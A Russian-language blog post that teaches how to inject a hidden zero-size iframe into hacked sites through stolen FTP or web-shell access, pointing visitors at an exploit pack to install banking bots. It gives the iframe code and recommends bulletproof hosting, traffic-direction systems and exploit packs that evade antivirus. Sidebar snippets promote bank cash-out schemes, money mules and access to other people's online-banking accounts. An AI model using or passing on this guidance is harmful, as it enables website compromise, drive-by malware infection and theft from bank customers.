Skip to main content

Кому и зачем нужен iFrame трафик и причём тут реальные заливщики и обнал


Трафик - на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф - это смешаный трафик нескольких стран стразу.

как конвертировать трафик в просмотры AdSense

Для чего нужен трафик?
В своей основе iFrame трафик дроповоды и реальные заливщики денег на карты и счета используют для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

Где взять трафик?
Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок...

Чтобы иметь трафик дроповодам нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме - это самый надёжный вариант.

Для чего мне нужны FTP и Shell и что мне с ними делать?
iFrame - это код HTML внутри страницы. С помощью iFrame дроповод может вставлять один HTML документ в другой! Проще говоря, iFrame - это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

<iframe src="http://site.ru/sploit.php" width="0" height="0" frameborder="0"></iframe>

где:

http://site.ru/sploit.php - это сайт на который пользователи site.ru будут заходить одновременно
width="0" длина равна 0
height="0" высота равна 0
frameborder="0" граница фрейма равна 0

Что делать с Iframe?
Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

Что нужно для продажи трафика?
Есть такая штука, как TDS - Traffic Direct System, - это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
Ну вот и всё, теперь поговорим про загрузки.

Что же такое эти загрузки?
Загрузки - это загрузка и запуск файла на компьютере клиента банка или простого лоха, - один из самых распространённых методов распространения банковских ботов в Интернет.



Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов...

Загрузки - это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

Что нам нужно для того чтобы делать загрузки?
Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

Теперь про связку сплоитов
Exploit - это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

Что же такое пробив связки?
Пробив - это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился - тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

Как делать загрузки?
Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php - значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

Comments

Popular posts from this blog

Сбербанк и дропы с площадки Dark Money, и кто кого?

Крупных открытых площадок в даркнете, специализирующихся именно на покупке-продаже российских банковских данных, обнале и скаме около десятка, самая большая из них – это Dark Money . Здесь есть нальщики, дропы, заливщики, связанный с ними бизнес, здесь льют и налят миллионы, здесь очень много денег, но тебе не стоит пока во все это суваться. Кинуть тут может любой, тут кидали и на десятки миллионов и на десятки рублей. Кидали новички и кидали проверенные люди, закономерности нету. Горячие темы – продажи данных, банковских карт, поиск сотрудников в скам и вербовка сотрудников банков и сотовых операторов, взлом аккаунтов, обнал и советы – какими платежными системы пользоваться, как не попасться милиции при обнале, сколько платить Правому Сектору или патрулю, если попались. Одна из тем – онлайн-интервью с неким сотрудником Сбербанка, который время от времени отвечает на вопросы пользователей площадки об уязвимостях системы банка и дает советы, как улучшить обнальные схемы. Чтобы пользова

Где искать залив на банковский счет или карту?

Есть несколько способов сделать банковский перевод на карту или счет или иначе на слэнге дроповодов это называется "сделать залив на карту " для начала работы вам понадобиться зайти в чей-то чужой уже существующий кабинет интернет-банка, причем не важно какого, банк может быть любым, главное чтобы на счету " холдера " были хоть какие-то деньги для того, чтобы зайти в интернет банк вам понадобится узнать логин и пароль, смотрим видео о том, как их получить для того, чтобы зайти в чужой интернет-банк: хотя конечно, скажу тебе честно, только ты не обижайся, сейчас все нормальные сделки по обналу делают краснопёрые, сидящие в банках, всякие там внедрённые агенты ФСО, Mi6 или CIA, а льют сотрудники крупных телекомов или штатные работники NSA и GCHQ, а всё остальное - это просто лоховство или чистой воды развод на бабло в виде предоплаты

Как работает банк со своими корреспондентами по SWIFT

Итак, наш банк имеет открытые корреспондентские счета в США (CITIBANK N.A. NEW YORK), в Европе (VTB BANK DEUTSCHLAND AG), в России (Промсвязьбанк Москва и Собинбанк Москва). Соответственно, все расследования по платежам происходят через эти банки согласно  установленным корреспондентским отношениям с использованием соответствующих форматов SWIFT MT-195/295, MT-196/296, MT-199/299 и MT-192/292 Кроме прямых корреспондентских отношений с банками, нашим банком установлены отношения и с другими финансовыми организациями через процедуру обмена ключами, что даёт возможность использовать SWIFT-форматы МТ-195, МТ-196 и МТ-199 для проведения процедуры расследования по стандартным платежам и платежам с покрытием: - DEUTSCHE BANK TRUST COMPANY AMERICAS USA - COMMERZBANK AG Germany - CITIBANK N.A. London - CITIBANK N.A. Brussels - BANQUE DE COMMERCE ET DE PLACEMENTS S.A. Geneva - NORVIK BANKA JSC  LV - ABLV BANK AS  LV В среднем процедура расследования занимает от 3 до 14 дней (е

Как найти реального заливщика

Своего первого реального заливщика, который показал мне как можно скачать деньги в интернет с банковских счетов, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером немного подрабатывая продавая трафик налево , но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 500 000 гривен в Гарант, но потом призадумался, а стоит ли? Ко мне начал обращаться народ обращается разных категорий 1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10 000 USD им на Вебмани в качестве аванса  2. Реальные мэны, которые  льют сразу большую сумму по SWIFT  без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал, они сразу пропадают, суть данных действий я так и не понял. зачем пропадать, если всё прошло гладко? 3. Мутные личност

DDOS атаки на маршрутизатор и методы защиты Juniper routing engine

По долгу службы мне часто приходится сталкиваться с DDOS на сервера, но некоторое время назад столкнулся с другой атакой, к которой был не готов. Атака производилась на маршрутизатор  Juniper MX80 поддерживающий BGP сессии и выполняющий анонс сетей дата-центра. Целью атакующих был веб-ресурс расположенный на одном из наших серверов, но в результате атаки, без связи с внешним миром остался весь дата-центр. Подробности атаки, а также тесты и методы борьбы с такими атаками под катом.  История атаки Исторически сложилось, что на маршрутизаторе блокируется весь UDP трафик летящий в нашу сеть. Первая волна атаки (в 17:22) была как раз UDP трафиком, график unicast пакетов с аплинка маршрутизатора: и график unicast пакетов с порта свича подключенного к роутеру: демонстрируют, что весь трафик осел на фильтре маршрутизатора. Поток unicast пакетов на аплинке маршрутизатора увеличился на 400 тысяч и атака только UDP пакетами продолжалась до 17:33. Далее атакующие изменили стратегию и добавили к

Google Pay просто так выплатил вознаграждение пользователям

Пользователи Google Pay массово сообщают , что Google перечислила на их счета от 10 до 1000 долларов США. Деньги поступили по программе Google Pay Reward в виде кешбэка, однако кешбэком не были. Такие поступления были ошибкой и сопровождались сообщением, что идет тестирование Google Pay Remittance , однако у тех, кто успел потратить полученные средства, их обещали не отбирать. Как писали и показывали на многочисленных скриншотах пользователи, переводы средств сопровождались сообщением: « dogfooding the Google Pay Remittance experience ». Дело в том, что термином « Dogfooding » обычно называют внутреннее бета-тестирование перед релизом каких-либо продуктов. То есть тестовые переводы должны были получить только сотрудники Google и, вероятно, некоторые партнеры компании. В настоящее время пользователям, получившим неожиданные переводы, уже прислали письма от команды Google Pay с подробным описанием «ошибки, которая привела к непреднамеренному зачислению средств на счет». Так как с